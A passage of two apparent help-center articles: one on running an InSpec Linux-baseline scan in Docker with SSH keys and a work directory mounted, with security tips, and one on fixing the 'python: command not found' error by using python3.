| -v $(pwd):/share | The directory you are currently in ($(pwd)) | /share | Share InSpec profiles, scripts, or output files with the container |

Using both mounts lets you interact with remote hosts (via SSH) and work with local test assets without copying them into the image.

Step-by-step example

1. Prepare your environment:

```bash
export DEPLOYMENT_SERVER=10.0.1.23
cd ~/my-inspec-profiles   # Directory containing custom controls
```

2. Run the scan:

```bash
docker run --rm \
  -v ~/.ssh:/root/.ssh \
  -v $(pwd):/share \
  hysnsec/inspec exec https://github.com/dev-sec/linux-baseline.git \
  -t ssh://root@$DEPLOYMENT_SERVER \
  -i ~/.ssh/id_rsa \
  --chef-license accept
```

3. Inspect results. The scan writes its report to standard output. If you want a file on the host, add a volume for a reports folder:

```bash
  -v $(pwd)/reports:/reports \
  ... \
  --reporter json:/reports/report.json
```

Best practices & security tips

- Least-privilege keys: Use a dedicated SSH key with limited permissions (e.g., read-only sudo) for scanning.
- Read-only mount: Prevent accidental modification of host keys by mounting read-only: -v ~/.ssh:/root/.ssh:ro
- Avoid embedding secrets in images: Never COPY ~/.ssh into a Dockerfile; always use bind-mounts at runtime.
- Clean up: The --rm flag ensures the container disappears after the run, but the host's key files remain untouched.
- Use SSH agent forwarding (advanced): If you prefer not to expose private keys, start the container with -v $SSH_AUTH_SOCK:/ssh-agent -e SSH_AUTH_SOCK=/ssh-agent and omit the -i flag.

Common questions

| Question | Answer |
|----------|--------|
| Do I still need -i if I mount the whole .ssh directory? | Yes. The mount makes the key visible; -i tells InSpec which key to present to the remote host. |
| Can I mount only a single key file instead of the whole directory? | Technically, yes: -v ~/.ssh/id_rsa:/root/.ssh/id_rsa. However, you would lose config and known_hosts, which may cause host-key verification failures. |
| What if my host uses a non-standard SSH config location? | Adjust the mount accordingly, e.g., -v /custom/ssh:/root/.ssh. |
| Is it safe to share the entire current directory with the container? | Generally yes, but avoid mounting sensitive files (password files, tokens) unless required. Use a dedicated sub-directory if you need tighter control. |

Takeaway

Mounting ~/.ssh as a Docker volume supplies the container with all the SSH artefacts it needs, while the -i flag explicitly selects the private key for authentication. The second -v flag shares your local work directory, enabling seamless interaction between host and container. By following the best-practice checklist above, you can run DevSecOps scans securely, reproducibly, and without exposing secret material inside Docker images.
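When wrapping this scan in CI glue code, it can help to assemble the docker run invocation programmatically instead of hand-editing a long shell line. A sketch under the article's assumptions (image hysnsec/inspec, the dev-sec profile URL); the helper name is illustrative, and the :ro suffix applies the read-only best practice from the checklist:

```python
def build_inspec_command(server, workdir, home):
    """Assemble the docker run argument list for an InSpec SSH scan.

    server  - IP or hostname of the target (the article's $DEPLOYMENT_SERVER)
    workdir - host directory to share with the container at /share
    home    - host home directory containing the .ssh folder
    """
    return [
        "docker", "run", "--rm",
        "-v", f"{home}/.ssh:/root/.ssh:ro",   # SSH keys and config, read-only
        "-v", f"{workdir}:/share",            # local profiles / output
        "hysnsec/inspec", "exec",
        "https://github.com/dev-sec/linux-baseline.git",
        "-t", f"ssh://root@{server}",
        "-i", "/root/.ssh/id_rsa",            # key path inside the container
        "--chef-license", "accept",
    ]
```

Passing the list to subprocess.run() avoids shell quoting pitfalls, and each mount or flag can be toggled in one place (e.g., swapping the -i flag for the agent-forwarding variant described above).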

Last updated on Jan 07, 2026

Python Command Not Found Error and How to Fix It Using Python3

Overview

In some systems, especially modern Linux and macOS environments, the python command may not be available by default. When users try to run Python scripts or execute Python commands, they may encounter an error such as command not found or python: not found. This behavior is expected and usually means that Python is installed on the system under the python3 command instead of python.

Why This Happens

Many operating systems have moved to Python 3 as the default version. To avoid confusion with the deprecated Python 2, the python command is sometimes not created automatically. As a result, users must explicitly use python3 when running Python commands. This is common on:
- Linux distributions such as Ubuntu, Debian, and CentOS
- macOS systems
- Cloud-based or containerized environments
- Minimal or hardened lab environments

How to Resolve the Issue

If you encounter an error indicating that the python command is not found, simply replace it with python3. This ensures that you are using the correct Python interpreter that is installed on the system.

Examples

Example 1: Running a Python script

```bash
python script.py    # fails with "command not found"
python3 script.py   # use this instead
```

Example 2: Checking the Python version

```bash
python --version    # returns an error
python3 --version   # use this instead
```

Example 3: Starting the Python interactive shell

```bash
python    # does not work
python3   # use this instead
```

Example 4: Running a one-line Python command

```bash
python -c "print('Hello World')"    # fails
python3 -c "print('Hello World')"   # use this instead
```

Additional Notes

- Always verify which Python version is required for your project or script.
- Some environments may allow you to create an alias from python to python3, but this depends on system permissions and is not always recommended in shared or exam environments.
- Using python3 explicitly helps avoid compatibility issues and ensures consistent behavior.
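If you write automation that must run on systems with either command name, you can resolve the interpreter at runtime instead of hard-coding one. A minimal sketch using only the standard library, preferring python3 (the function name is illustrative):

```python
import shutil

def find_python():
    """Return the first available Python command name, preferring python3.

    shutil.which() searches the PATH the same way a shell would,
    so this mirrors typing the command at a prompt.
    """
    for candidate in ("python3", "python"):
        if shutil.which(candidate):
            return candidate
    return None  # no Python interpreter on the PATH at all
```

A wrapper script can then invoke scripts via the returned name, which sidesteps the command-not-found error on systems that only ship python3.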
Summary If you see an error stating that the python command is not found, it usually means Python 3 is installed but must be invoked using python3. Switching to python3 is a quick and reliable solution that works across most modern systems.

Last updated on Feb 11, 2026